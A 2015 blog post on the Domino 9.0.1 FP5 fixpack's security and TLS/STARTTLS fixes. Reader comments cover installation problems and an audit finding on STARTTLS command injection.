Domino on Linux/Unix, Troubleshooting, Best Practices, Tips and more ...

Domino 9.0.1 FP5 Security Fixes and Functionality

Daniel Nashed  4 December 2015 16:14:52
This week Domino 9.0.1 FP5 has been released.
The client fixpack seems to have issues. I have seen a Support Flash alert and a couple of customers/partners contacted me with problems.

On the client side I would wait until those problems have been resolved.

But on the server side you should look into implementing FP5 soon.


I have deployed it on my production server and I have now also incoming and outgoing "STARTTLS" enabled with additional logging via my SpamGeek application.


In addition to a couple of security fixes the new version also has some detail fixes in the TLS area which will help to get better logging and compatibility with other environments which is specially important for STARTTLS.


I am currently still having SSLV2 HELLO enabled on my server and I keep monitoring the logs.


And I have noticed some strange behaviour which I already have reported to IBM.
With 9.0.1 FP4 IF2 IBM changed the default cipher list and you did not need to set SSLCipherSpec in most cases because they did a great job enabling only all secure ciphers by default and putting the other ciphers on the weak list.


In addition to security fixes there is also an new JVM patch included in FP5.


The current JVM is 1.6 SR16 FP15 and there is a separate technote available with details what is fixed.


Some of the fixes in Domino and also in the JVM provide better protection against "Logjam security vulnerability".


There are also a couple of fixes to address memory leaks -- some are in the security area.


So I would recommend considering the update soon at least on server side for external servers.


It works well for me and there is additional logging that can be helpful.


Update 10.12.2015: We still see some outgoing TLS connection problems for STARTTLS. I first thought this could be fixed by setting the SSLCipherSpec explicitly.
But it did turn out that it does not fix it. Still troubleshooting what is going wrong. One customer has a PMR open and I am also tracing...

Comments

1Craig Wiseman  05.12.2015 16:39:28  Domino 9.0.1 FP5 Security Fixes and Functionality

Thanks for this specifically, and for your continued work and posts on Domino-related config & security.

2Tim Banks  08.12.2015 18:55:16  Domino 9.0.1 FP5 Security Fixes and Functionality

FP5 failed to install for me on 9.0.1FP4 HF70 Win64. Error message said it detected the wrong version of Domino installed. Now Traveler and HTTPS seem to be broken from something changed during the fixpack installation (which I thought aborted).

3Dan Silva (@dansilva)  09.12.2015 14:11:33  Re: FP5 failed to install for me on 9.0.1FP4 HF70

@Tim, you need to uninstall HF70 first.

If there are any specific fixes in HF70 for your environment, it's a good practice to check with IBM Support if the fixes in HF70 are included in FP5. If not, you can request a new Hot Fix with the fixes in HF70 for FP5.

Hope this helps!

Daniel

4Tim Burr  11.12.2015 6:50:58  Domino 9.0.1 FP5 Security Fixes and Functionality

Daniel thanks so much for everything you do! We have been using your Domino linux startup scripts for years and they have been awesome.

Quick question, and I understand if you don't have time to answer.

How did you set this up?

>>I have now also incoming and outgoing "STARTTLS" enabled

5Stefano Benassi  13.12.2015 9:51:27  Domino 9.0.1 FP5 Security Fixes and Functionality

@Tim this may help you: https://www-304.ibm.com/support/docview.wss?uid=swg21108352

Stefano

6Daniel Nashed  14.12.2015 7:42:10  Domino 9.0.1 FP5 Security Fixes and Functionality

@Tim Burr, what exactly are you looking for?

You said that you have it enabled. What additional information do you need?

Are you running into any issues?

-- Daniel

7Tim Burr  16.12.2015 18:34:53  Domino 9.0.1 FP5 Security Fixes and Functionality

Hi Daniel & Stefano,

A security audit found this vulnerability in our setup:

The remote SMTP service contains a software flaw in its STARTTLS implementation that could allow a remote, unauthenticated attacker to inject commands during the plaintext protocol phase that will be executed during the ciphertext protocol phase.

I will review the link Stefano sent and make sure we have it configured correctly.

Archives


  • [IBM Lotus Domino]
  • [Domino on Linux]
  • [Nash!Com]
  • [Daniel Nashed]